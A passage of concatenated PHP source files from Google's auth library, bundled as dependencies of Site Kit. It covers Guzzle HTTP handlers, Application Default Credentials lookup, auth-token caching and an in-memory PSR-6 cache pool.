License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth\HttpHandler; use Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface; class Guzzle6HttpHandler { /** * @var ClientInterface */ private $client; /** * @param ClientInterface $client */ public function __construct(\Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface $client) { $this->client = $client; } /** * Accepts a PSR-7 request and an array of options and returns a PSR-7 response. * * @param RequestInterface $request * @param array<mixed> $options * @return ResponseInterface */ public function __invoke(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options = []) { return $this->client->send($request, $options); } /** * Accepts a PSR-7 request and an array of options and returns a PromiseInterface * * @param RequestInterface $request * @param array<mixed> $options * * @return \GuzzleHttp\Promise\PromiseInterface */ public function async(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options = []) { return $this->client->sendAsync($request, $options); } } <?php /* * Copyright 2019 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth\HttpHandler; use Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface; /** * Stores an HTTP Client in order to prevent multiple instantiations. */ class HttpClientCache { /** * @var ClientInterface|null */ private static $httpClient; /** * Cache an HTTP Client for later calls. * * Passing null will unset the cached client. * * @param ClientInterface|null $client * @return void */ public static function setHttpClient(?\Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface $client = null) { self::$httpClient = $client; } /** * Get the stored HTTP Client, or null. * * @return ClientInterface|null */ public static function getHttpClient() { return self::$httpClient; } } <?php /** * Copyright 2015 Google Inc. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth\HttpHandler; use Google\Site_Kit_Dependencies\GuzzleHttp\BodySummarizer; use Google\Site_Kit_Dependencies\GuzzleHttp\Client; use Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface; use Google\Site_Kit_Dependencies\GuzzleHttp\HandlerStack; use Google\Site_Kit_Dependencies\GuzzleHttp\Middleware; class HttpHandlerFactory { /** * Builds out a default http handler for the installed version of guzzle. * * @param ClientInterface $client * @return Guzzle6HttpHandler|Guzzle7HttpHandler * @throws \Exception */ public static function build(?\Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface $client = null) { if (\is_null($client)) { $stack = null; if (\class_exists(\Google\Site_Kit_Dependencies\GuzzleHttp\BodySummarizer::class)) { // double the # of characters before truncation by default $bodySummarizer = new \Google\Site_Kit_Dependencies\GuzzleHttp\BodySummarizer(240); $stack = \Google\Site_Kit_Dependencies\GuzzleHttp\HandlerStack::create(); $stack->remove('http_errors'); $stack->unshift(\Google\Site_Kit_Dependencies\GuzzleHttp\Middleware::httpErrors($bodySummarizer), 'http_errors'); } $client = new \Google\Site_Kit_Dependencies\GuzzleHttp\Client(['handler' => $stack]); } $version = null; if (\defined('Google\\Site_Kit_Dependencies\\GuzzleHttp\\ClientInterface::MAJOR_VERSION')) { $version = \Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface::MAJOR_VERSION; } elseif (\defined('Google\\Site_Kit_Dependencies\\GuzzleHttp\\ClientInterface::VERSION')) { $version = (int) \substr(\Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface::VERSION, 0, 1); } switch ($version) { case 6: return new \Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\Guzzle6HttpHandler($client); case 7: return new \Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\Guzzle7HttpHandler($client); default: throw new \Exception('Version not supported'); } } } <?php /** * Copyright 2020 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth\HttpHandler; class Guzzle7HttpHandler extends \Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\Guzzle6HttpHandler { } <?php /* * Copyright 2015 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth; use DomainException; use Google\Site_Kit_Dependencies\Google\Auth\Credentials\AppIdentityCredentials; use Google\Site_Kit_Dependencies\Google\Auth\Credentials\GCECredentials; use Google\Site_Kit_Dependencies\Google\Auth\Credentials\ServiceAccountCredentials; use Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpClientCache; use Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory; use Google\Site_Kit_Dependencies\Google\Auth\Middleware\AuthTokenMiddleware; use Google\Site_Kit_Dependencies\Google\Auth\Middleware\ProxyAuthTokenMiddleware; use Google\Site_Kit_Dependencies\Google\Auth\Subscriber\AuthTokenSubscriber; use Google\Site_Kit_Dependencies\GuzzleHttp\Client; use InvalidArgumentException; use Google\Site_Kit_Dependencies\Psr\Cache\CacheItemPoolInterface; /** * ApplicationDefaultCredentials obtains the default credentials for * authorizing a request to a Google service. * * Application Default Credentials are described here: * https://developers.google.com/accounts/docs/application-default-credentials * * This class implements the search for the application default credentials as * described in the link. * * It provides three factory methods: * - #get returns the computed credentials object * - #getSubscriber returns an AuthTokenSubscriber built from the credentials object * - #getMiddleware returns an AuthTokenMiddleware built from the credentials object * * This allows it to be used as follows with GuzzleHttp\Client: * * ``` * use Google\Auth\ApplicationDefaultCredentials; * use GuzzleHttp\Client; * use GuzzleHttp\HandlerStack; * * $middleware = ApplicationDefaultCredentials::getMiddleware( * 'https://www.googleapis.com/auth/taskqueue' * ); * $stack = HandlerStack::create(); * $stack->push($middleware); * * $client = new Client([ * 'handler' => $stack, * 'base_uri' => 'https://www.googleapis.com/taskqueue/v1beta2/projects/', * 'auth' => 'google_auth' // authorize all requests * ]); * * $res = $client->get('myproject/taskqueues/myqueue'); * ``` */ class ApplicationDefaultCredentials { /** * @deprecated * * Obtains an AuthTokenSubscriber that uses the default FetchAuthTokenInterface * implementation to use in this environment. * * If supplied, $scope is used to in creating the credentials instance if * this does not fallback to the compute engine defaults. * * @param string|string[] $scope the scope of the access request, expressed * either as an Array or as a space-delimited String. * @param callable $httpHandler callback which delivers psr7 request * @param array<mixed> $cacheConfig configuration for the cache when it's present * @param CacheItemPoolInterface $cache A cache implementation, may be * provided if you have one already available for use. * @return AuthTokenSubscriber * @throws DomainException if no implementation can be obtained. */ public static function getSubscriber( // @phpstan-ignore-line $scope = null, ?callable $httpHandler = null, ?array $cacheConfig = null, ?\Google\Site_Kit_Dependencies\Psr\Cache\CacheItemPoolInterface $cache = null ) { $creds = self::getCredentials($scope, $httpHandler, $cacheConfig, $cache); /** @phpstan-ignore-next-line */ return new \Google\Site_Kit_Dependencies\Google\Auth\Subscriber\AuthTokenSubscriber($creds, $httpHandler); } /** * Obtains an AuthTokenMiddleware that uses the default FetchAuthTokenInterface * implementation to use in this environment. * * If supplied, $scope is used to in creating the credentials instance if * this does not fallback to the compute engine defaults. * * @param string|string[] $scope the scope of the access request, expressed * either as an Array or as a space-delimited String. * @param callable $httpHandler callback which delivers psr7 request * @param array<mixed> $cacheConfig configuration for the cache when it's present * @param CacheItemPoolInterface $cache A cache implementation, may be * provided if you have one already available for use. * @param string $quotaProject specifies a project to bill for access * charges associated with the request. * @return AuthTokenMiddleware * @throws DomainException if no implementation can be obtained. */ public static function getMiddleware($scope = null, ?callable $httpHandler = null, ?array $cacheConfig = null, ?\Google\Site_Kit_Dependencies\Psr\Cache\CacheItemPoolInterface $cache = null, $quotaProject = null) { $creds = self::getCredentials($scope, $httpHandler, $cacheConfig, $cache, $quotaProject); return new \Google\Site_Kit_Dependencies\Google\Auth\Middleware\AuthTokenMiddleware($creds, $httpHandler); } /** * Obtains the default FetchAuthTokenInterface implementation to use * in this environment. * * @param string|string[] $scope the scope of the access request, expressed * either as an Array or as a space-delimited String. * @param callable $httpHandler callback which delivers psr7 request * @param array<mixed> $cacheConfig configuration for the cache when it's present * @param CacheItemPoolInterface $cache A cache implementation, may be * provided if you have one already available for use. * @param string $quotaProject specifies a project to bill for access * charges associated with the request. * @param string|string[] $defaultScope The default scope to use if no * user-defined scopes exist, expressed either as an Array or as a * space-delimited string. * @param string $universeDomain Specifies a universe domain to use for the * calling client library * * @return FetchAuthTokenInterface * @throws DomainException if no implementation can be obtained. */ public static function getCredentials($scope = null, ?callable $httpHandler = null, ?array $cacheConfig = null, ?\Google\Site_Kit_Dependencies\Psr\Cache\CacheItemPoolInterface $cache = null, $quotaProject = null, $defaultScope = null, ?string $universeDomain = null) { $creds = null; $jsonKey = \Google\Site_Kit_Dependencies\Google\Auth\CredentialsLoader::fromEnv() ?: \Google\Site_Kit_Dependencies\Google\Auth\CredentialsLoader::fromWellKnownFile(); $anyScope = $scope ?: $defaultScope; if (!$httpHandler) { if (!($client = \Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpClientCache::getHttpClient())) { $client = new \Google\Site_Kit_Dependencies\GuzzleHttp\Client(); \Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpClientCache::setHttpClient($client); } $httpHandler = \Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory::build($client); } if (\is_null($quotaProject)) { // if a quota project isn't specified, try to get one from the env var $quotaProject = \Google\Site_Kit_Dependencies\Google\Auth\CredentialsLoader::quotaProjectFromEnv(); } if (!\is_null($jsonKey)) { if ($quotaProject) { $jsonKey['quota_project_id'] = $quotaProject; } if ($universeDomain) { $jsonKey['universe_domain'] = $universeDomain; } $creds = \Google\Site_Kit_Dependencies\Google\Auth\CredentialsLoader::makeCredentials($scope, $jsonKey, $defaultScope); } elseif (\Google\Site_Kit_Dependencies\Google\Auth\Credentials\AppIdentityCredentials::onAppEngine() && !\Google\Site_Kit_Dependencies\Google\Auth\Credentials\GCECredentials::onAppEngineFlexible()) { $creds = new \Google\Site_Kit_Dependencies\Google\Auth\Credentials\AppIdentityCredentials($anyScope); } elseif (self::onGce($httpHandler, $cacheConfig, $cache)) { $creds = new \Google\Site_Kit_Dependencies\Google\Auth\Credentials\GCECredentials(null, $anyScope, null, $quotaProject, null, $universeDomain); $creds->setIsOnGce(\true); // save the credentials a trip to the metadata server } if (\is_null($creds)) { throw new \DomainException(self::notFound()); } if (!\is_null($cache)) { $creds = new \Google\Site_Kit_Dependencies\Google\Auth\FetchAuthTokenCache($creds, $cacheConfig, $cache); } return $creds; } /** * Obtains an AuthTokenMiddleware which will fetch an ID token to use in the * Authorization header. The middleware is configured with the default * FetchAuthTokenInterface implementation to use in this environment. * * If supplied, $targetAudience is used to set the "aud" on the resulting * ID token. * * @param string $targetAudience The audience for the ID token. * @param callable $httpHandler callback which delivers psr7 request * @param array<mixed> $cacheConfig configuration for the cache when it's present * @param CacheItemPoolInterface $cache A cache implementation, may be * provided if you have one already available for use. * @return AuthTokenMiddleware * @throws DomainException if no implementation can be obtained. */ public static function getIdTokenMiddleware($targetAudience, ?callable $httpHandler = null, ?array $cacheConfig = null, ?\Google\Site_Kit_Dependencies\Psr\Cache\CacheItemPoolInterface $cache = null) { $creds = self::getIdTokenCredentials($targetAudience, $httpHandler, $cacheConfig, $cache); return new \Google\Site_Kit_Dependencies\Google\Auth\Middleware\AuthTokenMiddleware($creds, $httpHandler); } /** * Obtains an ProxyAuthTokenMiddleware which will fetch an ID token to use in the * Authorization header. The middleware is configured with the default * FetchAuthTokenInterface implementation to use in this environment. * * If supplied, $targetAudience is used to set the "aud" on the resulting * ID token. * * @param string $targetAudience The audience for the ID token. * @param callable $httpHandler callback which delivers psr7 request * @param array<mixed> $cacheConfig configuration for the cache when it's present * @param CacheItemPoolInterface $cache A cache implementation, may be * provided if you have one already available for use. * @return ProxyAuthTokenMiddleware * @throws DomainException if no implementation can be obtained. */ public static function getProxyIdTokenMiddleware($targetAudience, ?callable $httpHandler = null, ?array $cacheConfig = null, ?\Google\Site_Kit_Dependencies\Psr\Cache\CacheItemPoolInterface $cache = null) { $creds = self::getIdTokenCredentials($targetAudience, $httpHandler, $cacheConfig, $cache); return new \Google\Site_Kit_Dependencies\Google\Auth\Middleware\ProxyAuthTokenMiddleware($creds, $httpHandler); } /** * Obtains the default FetchAuthTokenInterface implementation to use * in this environment, configured with a $targetAudience for fetching an ID * token. * * @param string $targetAudience The audience for the ID token. * @param callable $httpHandler callback which delivers psr7 request * @param array<mixed> $cacheConfig configuration for the cache when it's present * @param CacheItemPoolInterface $cache A cache implementation, may be * provided if you have one already available for use. * @return FetchAuthTokenInterface * @throws DomainException if no implementation can be obtained. * @throws InvalidArgumentException if JSON "type" key is invalid */ public static function getIdTokenCredentials($targetAudience, ?callable $httpHandler = null, ?array $cacheConfig = null, ?\Google\Site_Kit_Dependencies\Psr\Cache\CacheItemPoolInterface $cache = null) { $creds = null; $jsonKey = \Google\Site_Kit_Dependencies\Google\Auth\CredentialsLoader::fromEnv() ?: \Google\Site_Kit_Dependencies\Google\Auth\CredentialsLoader::fromWellKnownFile(); if (!$httpHandler) { if (!($client = \Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpClientCache::getHttpClient())) { $client = new \Google\Site_Kit_Dependencies\GuzzleHttp\Client(); \Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpClientCache::setHttpClient($client); } $httpHandler = \Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory::build($client); } if (!\is_null($jsonKey)) { if (!\array_key_exists('type', $jsonKey)) { throw new \InvalidArgumentException('json key is missing the type field'); } if ($jsonKey['type'] == 'authorized_user') { throw new \InvalidArgumentException('ID tokens are not supported for end user credentials'); } if ($jsonKey['type'] != 'service_account') { throw new \InvalidArgumentException('invalid value in the type field'); } $creds = new \Google\Site_Kit_Dependencies\Google\Auth\Credentials\ServiceAccountCredentials(null, $jsonKey, null, $targetAudience); } elseif (self::onGce($httpHandler, $cacheConfig, $cache)) { $creds = new \Google\Site_Kit_Dependencies\Google\Auth\Credentials\GCECredentials(null, null, $targetAudience); $creds->setIsOnGce(\true); // save the credentials a trip to the metadata server } if (\is_null($creds)) { throw new \DomainException(self::notFound()); } if (!\is_null($cache)) { $creds = new \Google\Site_Kit_Dependencies\Google\Auth\FetchAuthTokenCache($creds, $cacheConfig, $cache); } return $creds; } /** * @return string */ private static function notFound() { $msg = 'Your default credentials were not found. To set up '; $msg .= 'Application Default Credentials, see '; $msg .= 'https://cloud.google.com/docs/authentication/external/set-up-adc'; return $msg; } /** * @param callable $httpHandler * @param array<mixed> $cacheConfig * @param CacheItemPoolInterface $cache * @return bool */ private static function onGce(?callable $httpHandler = null, ?array $cacheConfig = null, ?\Google\Site_Kit_Dependencies\Psr\Cache\CacheItemPoolInterface $cache = null) { $gceCacheConfig = []; foreach (['lifetime', 'prefix'] as $key) { if (isset($cacheConfig['gce_' . $key])) { $gceCacheConfig[$key] = $cacheConfig['gce_' . $key]; } } return (new \Google\Site_Kit_Dependencies\Google\Auth\GCECache($gceCacheConfig, $cache))->onGce($httpHandler); } } <?php /* * Copyright 2020 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth; /** * Describes a Credentials object which supports fetching the project ID. */ interface ProjectIdProviderInterface { /** * Get the project ID. * * @param callable $httpHandler Callback which delivers psr7 request * @return string|null */ public function getProjectId(?callable $httpHandler = null); } <?php /* * Copyright 2010 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth; use Google\Site_Kit_Dependencies\Psr\Cache\CacheItemPoolInterface; /** * A class to implement caching for any object implementing * FetchAuthTokenInterface */ class FetchAuthTokenCache implements \Google\Site_Kit_Dependencies\Google\Auth\FetchAuthTokenInterface, \Google\Site_Kit_Dependencies\Google\Auth\GetQuotaProjectInterface, \Google\Site_Kit_Dependencies\Google\Auth\GetUniverseDomainInterface, \Google\Site_Kit_Dependencies\Google\Auth\SignBlobInterface, \Google\Site_Kit_Dependencies\Google\Auth\ProjectIdProviderInterface, \Google\Site_Kit_Dependencies\Google\Auth\UpdateMetadataInterface { use CacheTrait; /** * @var FetchAuthTokenInterface */ private $fetcher; /** * @var int */ private $eagerRefreshThresholdSeconds = 10; /** * @param FetchAuthTokenInterface $fetcher A credentials fetcher * @param array<mixed> $cacheConfig Configuration for the cache * @param CacheItemPoolInterface $cache */ public function __construct(\Google\Site_Kit_Dependencies\Google\Auth\FetchAuthTokenInterface $fetcher, ?array $cacheConfig = null, ?\Google\Site_Kit_Dependencies\Psr\Cache\CacheItemPoolInterface $cache = null) { $this->fetcher = $fetcher; $this->cache = $cache; $this->cacheConfig = \array_merge(['lifetime' => 1500, 'prefix' => '', 'cacheUniverseDomain' => $fetcher instanceof \Google\Site_Kit_Dependencies\Google\Auth\Credentials\GCECredentials], (array) $cacheConfig); } /** * @return FetchAuthTokenInterface */ public function getFetcher() { return $this->fetcher; } /** * Implements FetchAuthTokenInterface#fetchAuthToken. * * Checks the cache for a valid auth token and fetches the auth tokens * from the supplied fetcher. * * @param callable $httpHandler callback which delivers psr7 request * @return array<mixed> the response * @throws \Exception */ public function fetchAuthToken(?callable $httpHandler = null) { if ($cached = $this->fetchAuthTokenFromCache()) { return $cached; } $auth_token = $this->fetcher->fetchAuthToken($httpHandler); $this->saveAuthTokenInCache($auth_token); return $auth_token; } /** * @return string */ public function getCacheKey() { return $this->getFullCacheKey($this->fetcher->getCacheKey()); } /** * @return array<mixed>|null */ public function getLastReceivedToken() { return $this->fetcher->getLastReceivedToken(); } /** * Get the client name from the fetcher. * * @param callable $httpHandler An HTTP handler to deliver PSR7 requests. * @return string */ public function getClientName(?callable $httpHandler = null) { if (!$this->fetcher instanceof \Google\Site_Kit_Dependencies\Google\Auth\SignBlobInterface) { throw new \RuntimeException('Credentials fetcher does not implement ' . 'Google\\Auth\\SignBlobInterface'); } return $this->fetcher->getClientName($httpHandler); } /** * Sign a blob using the fetcher. * * @param string $stringToSign The string to sign. * @param bool $forceOpenSsl Require use of OpenSSL for local signing. Does * not apply to signing done using external services. **Defaults to** * `false`. * @return string The resulting signature. * @throws \RuntimeException If the fetcher does not implement * `Google\Auth\SignBlobInterface`. */ public function signBlob($stringToSign, $forceOpenSsl = \false) { if (!$this->fetcher instanceof \Google\Site_Kit_Dependencies\Google\Auth\SignBlobInterface) { throw new \RuntimeException('Credentials fetcher does not implement ' . 'Google\\Auth\\SignBlobInterface'); } // Pass the access token from cache for credentials that sign blobs // using the IAM API. This saves a call to fetch an access token when a // cached token exists. if ($this->fetcher instanceof \Google\Site_Kit_Dependencies\Google\Auth\Credentials\GCECredentials || $this->fetcher instanceof \Google\Site_Kit_Dependencies\Google\Auth\Credentials\ImpersonatedServiceAccountCredentials) { $cached = $this->fetchAuthTokenFromCache(); $accessToken = $cached['access_token'] ?? null; return $this->fetcher->signBlob($stringToSign, $forceOpenSsl, $accessToken); } return $this->fetcher->signBlob($stringToSign, $forceOpenSsl); } /** * Get the quota project used for this API request from the credentials * fetcher. * * @return string|null */ public function getQuotaProject() { if ($this->fetcher instanceof \Google\Site_Kit_Dependencies\Google\Auth\GetQuotaProjectInterface) { return $this->fetcher->getQuotaProject(); } return null; } /* * Get the Project ID from the fetcher. * * @param callable $httpHandler Callback which delivers psr7 request * @return string|null * @throws \RuntimeException If the fetcher does not implement * `Google\Auth\ProvidesProjectIdInterface`. */ public function getProjectId(?callable $httpHandler = null) { if (!$this->fetcher instanceof \Google\Site_Kit_Dependencies\Google\Auth\ProjectIdProviderInterface) { throw new \RuntimeException('Credentials fetcher does not implement ' . 'Google\\Auth\\ProvidesProjectIdInterface'); } // Pass the access token from cache for credentials that require an // access token to fetch the project ID. This saves a call to fetch an // access token when a cached token exists. if ($this->fetcher instanceof \Google\Site_Kit_Dependencies\Google\Auth\Credentials\ExternalAccountCredentials) { $cached = $this->fetchAuthTokenFromCache(); $accessToken = $cached['access_token'] ?? null; return $this->fetcher->getProjectId($httpHandler, $accessToken); } return $this->fetcher->getProjectId($httpHandler); } /* * Get the Universe Domain from the fetcher. * * @return string */ public function getUniverseDomain() : string { if ($this->fetcher instanceof \Google\Site_Kit_Dependencies\Google\Auth\GetUniverseDomainInterface) { if ($this->cacheConfig['cacheUniverseDomain']) { return $this->getCachedUniverseDomain($this->fetcher); } return $this->fetcher->getUniverseDomain(); } return \Google\Site_Kit_Dependencies\Google\Auth\GetUniverseDomainInterface::DEFAULT_UNIVERSE_DOMAIN; } /** * Updates metadata with the authorization token. * * @param array<mixed> $metadata metadata hashmap * @param string $authUri optional auth uri * @param callable $httpHandler callback which delivers psr7 request * @return array<mixed> updated metadata hashmap * @throws \RuntimeException If the fetcher does not implement * `Google\Auth\UpdateMetadataInterface`. */ public function updateMetadata($metadata, $authUri = null, ?callable $httpHandler = null) { if (!$this->fetcher instanceof \Google\Site_Kit_Dependencies\Google\Auth\UpdateMetadataInterface) { throw new \RuntimeException('Credentials fetcher does not implement ' . 'Google\\Auth\\UpdateMetadataInterface'); } $cached = $this->fetchAuthTokenFromCache($authUri); if ($cached) { // Set the access token in the `Authorization` metadata header so // the downstream call to updateMetadata know they don't need to // fetch another token. if (isset($cached['access_token'])) { $metadata[self::AUTH_METADATA_KEY] = ['Bearer ' . $cached['access_token']]; } elseif (isset($cached['id_token'])) { $metadata[self::AUTH_METADATA_KEY] = ['Bearer ' . $cached['id_token']]; } } $newMetadata = $this->fetcher->updateMetadata($metadata, $authUri, $httpHandler); if (!$cached && ($token = $this->fetcher->getLastReceivedToken())) { $this->saveAuthTokenInCache($token, $authUri); } return $newMetadata; } /** * @param string|null $authUri * @return array<mixed>|null */ private function fetchAuthTokenFromCache($authUri = null) { // Use the cached value if its available. // // TODO: correct caching; update the call to setCachedValue to set the expiry // to the value returned with the auth token. // // TODO: correct caching; enable the cache to be cleared. // if $authUri is set, use it as the cache key $cacheKey = $authUri ? $this->getFullCacheKey($authUri) : $this->fetcher->getCacheKey(); $cached = $this->getCachedValue($cacheKey); if (\is_array($cached)) { if (empty($cached['expires_at'])) { // If there is no expiration data, assume token is not expired. // (for JwtAccess and ID tokens) return $cached; } if (\time() + $this->eagerRefreshThresholdSeconds < $cached['expires_at']) { // access token is not expired return $cached; } } return null; } /** * @param array<mixed> $authToken * @param string|null $authUri * @return void */ private function saveAuthTokenInCache($authToken, $authUri = null) { if (isset($authToken['access_token']) || isset($authToken['id_token'])) { // if $authUri is set, use it as the cache key $cacheKey = $authUri ? $this->getFullCacheKey($authUri) : $this->fetcher->getCacheKey(); $this->setCachedValue($cacheKey, $authToken); } } private function getCachedUniverseDomain(\Google\Site_Kit_Dependencies\Google\Auth\GetUniverseDomainInterface $fetcher) : string { $cacheKey = $this->getFullCacheKey($fetcher->getCacheKey() . 'universe_domain'); // @phpstan-ignore-line if ($universeDomain = $this->getCachedValue($cacheKey)) { return $universeDomain; } $universeDomain = $fetcher->getUniverseDomain(); $this->setCachedValue($cacheKey, $universeDomain); return $universeDomain; } } <?php /* * Copyright 2016 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth\Cache; use Google\Site_Kit_Dependencies\Psr\Cache\CacheItemInterface; use Google\Site_Kit_Dependencies\Psr\Cache\CacheItemPoolInterface; /** * Simple in-memory cache implementation. */ final class MemoryCacheItemPool implements \Google\Site_Kit_Dependencies\Psr\Cache\CacheItemPoolInterface { /** * @var CacheItemInterface[] */ private $items; /** * @var CacheItemInterface[] */ private $deferredItems; /** * {@inheritdoc} * * @return CacheItemInterface The corresponding Cache Item. */ public function getItem($key) : \Google\Site_Kit_Dependencies\Psr\Cache\CacheItemInterface { return \current($this->getItems([$key])); // @phpstan-ignore-line } /** * {@inheritdoc} * * @return iterable<CacheItemInterface> * A traversable collection of Cache Items keyed by the cache keys of * each item. A Cache item will be returned for each key, even if that * key is not found. However, if no keys are specified then an empty * traversable MUST be returned instead. */ public function getItems(array $keys = []) : iterable { $items = []; $itemClass = \PHP_VERSION_ID >= 80000 ? \Google\Site_Kit_Dependencies\Google\Auth\Cache\TypedItem::class : \Google\Site_Kit_Dependencies\Google\Auth\Cache\Item::class; foreach ($keys as $key) { $items[$key] = $this->hasItem($key) ? clone $this->items[$key] : new $itemClass($key); } return $items; } /** * {@inheritdoc} * * @return bool * True if item exists in the cache, false otherwise. */ public function hasItem($key) : bool { $this->isValidKey($key); return isset($this->items[$key]) && $this->items[$key]->isHit(); } /** * {@inheritdoc} * * @return bool * True if the pool was successfully cleared. False if there was an error. */ public function clear() : bool { $this->items = []; $this->deferredItems = []; return \true; } /** * {@inheritdoc} * * @return bool * True if the item was successfully removed. False if there was an error. */ public function deleteItem($key) : bool { return $this->deleteItems([$key]); } /** * {@inheritdoc} * * @return bool * True if the items were successfully removed. False if there was an error. */ public function deleteItems(array $keys) : bool { \array_walk($keys, [$this, 'isValidKey']); foreach ($keys as $key) { unset($this->items[$key]); } return \true; } /** * {@inheritdoc} * * @return bool * True if the item was successfully persisted. False if there was an error. */ public function save(\Google\Site_Kit_Dependencies\Psr\Cache\CacheItemInterface $item) : bool { $this->items[$item->getKey()] = $item; return \true; } /** * {@inheritdoc} * * @return bool * False if the item could not be queued or if a commit was attempted and failed. True otherwise. */ public function saveDeferred(\Google\Site_Kit_Dependencies\Psr\Cache\CacheItemInterface $item) : bool { $this->deferredItems[$item->getKey()] = $item; return \true; } /** * {@inheritdoc} * * @return bool * True if all not-yet-saved items were successfully saved or there were none. False otherwise. */ public function commit() : bool { foreach ($this->deferredItems as $item) { $this->save($item); } $this->deferredItems = []; return \true; } /** * Determines if the provided key is valid. * * @param string $key * @return bool * @throws InvalidArgumentException */ private function isValidKey($key) { $invalidCharacters = '{}()/\\\\@:'; if (!\is_string($key) || \preg_match("#[{$invalidCharacters}]#", $key)) { throw new \Google\Site_Kit_Dependencies\Google\Auth\Cache\InvalidArgumentException('The provided key is not valid: ' . \var_export($key, \true)); } return \true; } } <?php /* * Copyright 2016 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth\Cache; use DateTime; use DateTimeInterface; use DateTimeZone; use Google\Site_Kit_Dependencies\Psr\Cache\CacheItemInterface; use TypeError; /** * A cache item. * * This class will be used by MemoryCacheItemPool and SysVCacheItemPool * on PHP 7.4 and below. It is compatible with psr/cache 1.0 and 2.0 (PSR-6). * @see TypedItem for compatiblity with psr/cache 3.0. */ final class Item implements \Google\Site_Kit_Dependencies\Psr\Cache\CacheItemInterface { /** * @var string */ private $key; /** * @var mixed */ private $value; /** * @var DateTimeInterface|null */ private $expiration; /** * @var bool */ private $isHit = \false; /** * @param string $key */ public function __construct($key) { $this->key = $key; } /** * {@inheritdoc} */ public function getKey() { return $this->key; } /** * {@inheritdoc} */ public function get() { return $this->isHit() ? $this->value : null; } /** * {@inheritdoc} */ public function 